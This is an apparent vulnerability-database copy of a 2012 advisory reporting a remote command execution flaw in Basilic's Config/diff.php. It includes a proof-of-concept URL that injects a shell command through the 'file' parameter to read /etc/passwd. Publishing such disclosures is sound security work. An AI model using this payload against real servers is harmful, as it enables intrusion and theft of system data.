Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28256
HistoryJul 09, 2012 - 12:00 a.m.

Basilic RCE bug

2012-07-0900:00:00
vulners.com
17
JSON

Hi
Dear Sir

Basilic is an Automated Bibliography Server for Research Publications Diffusion that use by many research center.
there is a RCE bug in basilic/Config/diff.php s could allow an attacker to run system command in server.
sample:
http://127.0.0.1/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2

Regards
M.Razavi

JSON